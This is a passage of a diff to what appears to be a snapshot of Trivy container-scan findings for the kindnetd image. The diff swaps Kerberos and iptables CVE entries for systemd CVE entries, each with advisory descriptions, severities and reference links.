"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", }, { "type": "URL", - "value": "http://secunia.com/advisories/47998", + "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", }, { "type": "URL", - "value": "http://secunia.com/advisories/48256", + "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/48692", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/48915", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://secunia.com/advisories/48948", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://secunia.com/advisories/49198", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", }, { "type": "URL", - "value": "http://secunia.com/advisories/55322", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", }, { "type": "URL", - "value": "http://secunia.com/advisories/55350", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "http://secunia.com/advisories/55351", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3844", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "http://www.securityfocus.com/bid/108096", + "https://access.redhat.com/security/cve/CVE-2019-3844", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "https://linux.oracle.com/cve/CVE-2019-3844.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3844", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "references": [ { "type": "URL", - "value": "http://support.apple.com/kb/HT4999", + "value": "https://avd.aquasec.com/nvd/cve-2019-3844", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5001", + "value": "http://www.securityfocus.com/bid/108096", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5130", + "value": "https://access.redhat.com/security/cve/CVE-2019-3844", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5281", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5501", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT6150", + "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", }, { "type": "URL", - "value": "http://technet.microsoft.com/security/advisory/2588513", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "http://vnhacker.blogspot.com/2011/09/beast.html", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://www.debian.org/security/2012/dsa-2398", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", }, { "type": "URL", - "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "http://www.insecure.cl/Beast-SSL.rar", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "241-7~deb10u9", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-26604", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-26604", + "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "https://github.com/systemd/systemd/issues/5666", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "https://security.netapp.com/advisory/ntap-20230505-0009/", + "https://www.cve.org/CVERecord?id=CVE-2023-26604", + ], + }, + "category": "Vulnerability", + "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "privilege escalation via the less pager", + "references": [ { "type": "URL", - "value": "http://www.kb.cert.org/vuls/id/864643", + "value": "https://avd.aquasec.com/nvd/cve-2023-26604", }, { "type": "URL", - "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "value": "https://access.redhat.com/security/cve/CVE-2023-26604", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1151/", + "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1160/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1151/", + "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1160/", + "value": "https://github.com/systemd/systemd/issues/5666", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1151/", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1160/", + "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", }, { "type": "URL", - "value": "http://www.opera.com/support/kb/view/1004/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "241-7~deb10u8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33910", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "https://access.redhat.com/security/cve/CVE-2021-33910", + "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "https://linux.oracle.com/cve/CVE-2021-33910.html", + "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20211104-0008/", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "https://www.debian.org/security/2021/dsa-4942", + "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + ], + }, + "category": "Vulnerability", + "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "references": [ { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-33910", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49388", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49778", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1029190", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1025997", + "value": "https://access.redhat.com/security/cve/CVE-2021-33910", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026103", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026704", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", }, { "type": "URL", - "value": "http://www.ubuntu.com/usn/USN-1263-1", + "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", }, { "type": "URL", - "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-3389", + "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", }, { "type": "URL", - "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", }, { "type": "URL", - "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", }, { "type": "URL", - "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", }, { "type": "URL", - "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13154861", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13155432", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", }, { "type": "URL", - "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "value": "https://www.debian.org/security/2021/dsa-4942", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-1263-1", + "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3997", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2021-3997", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5226-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "https://www.openwall.com/lists/oss-security/2022/01/10/2", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://avd.aquasec.com/nvd/cve-2021-3997", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://access.redhat.com/security/cve/CVE-2021-3997", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://ubuntu.com/security/notices/USN-5226-1", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", + ], + }, + "category": "Vulnerability", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "buffer overrun in format_timespan() function", + "references": [ { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libip4tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - 